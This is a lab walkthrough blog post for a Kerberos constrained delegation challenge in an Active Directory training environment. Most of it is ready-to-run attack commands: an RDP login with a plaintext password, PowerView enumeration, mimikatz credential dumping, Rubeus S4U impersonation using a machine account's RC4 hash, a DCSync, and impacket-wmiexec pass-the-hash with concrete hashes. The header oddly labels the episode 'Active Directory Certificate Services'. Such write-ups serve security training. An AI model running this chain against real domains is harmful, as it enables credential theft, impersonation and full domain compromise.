Post

IML - Kerberos: Ep.10 – Active Directory Certificate Services

Kerberos Ep.10 – Constrained Delegation - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



IML - Kerberos: Ep.12 – Active Directory Certificate Services

IML - Kerberos: Ep.10 – Constrained Delegation

image1

  • RDP:
1
2
xfreerdp /v:10.102.178.2 /u:s.villanelle /d:krbtown /p:Summ3r2021! +clipboard +drives /drive:root,/home/kali /dynamic-resolution

  • Enumerating for constrained delegation:
    • Open Powerview_dev.ps1:
1
2
. .\Powerview_dev.ps1
Get-DomainComputer -TrustedToAuth

image2

image3

image4

image5

  • RDP to WKS-02
  • Run mimikatz
1
2
3
privilege::debug
sekurlsa::logonpasswords

image6

image7

  • Impersonate a.belridge, using workstation-02$ as the target host:
1
2
3
4
.\Rubeus.exe s4u /user:workstation-02$ /rc4:[HASH] /domain:krbtown.local /impersonateuser:a.belridge /msdsspn:"ldap/dc01.krbtown.local" /dc:dc01.krbtown.local /ptt

.\Rubeus.exe s4u /user:workstation-02$ /rc4:6ee2e72810d54399a588b424ac22df1e /domain:krbtown.local /impersonateuser:a.belridge /msdsspn:"ldap/dc01.krbtown.local" /dc:dc01.krbtown.local /ptt

image8

image9

image10

image11

image12

image13

  • Run Mimikatz on an elevated command prompt:
1
2
lsadump::dcsync /user:krbtown\a.belridge

image14

  • Use wmiexec to get shell:
1
2
3
4
impacket-wmiexec [DOMAIN][USERNAME]@[TARGET] -hashes '[LM-HASH]:[NT-HASH]'

impacket-wmiexec krbtown/a.belridge@10.102.93.148 -hashes 'a76a0f6f801d8430903f7f299c18dfc4:ed882753d4665914577c19b6b85ead51'

image15

This post is licensed under CC BY 4.0 by the author.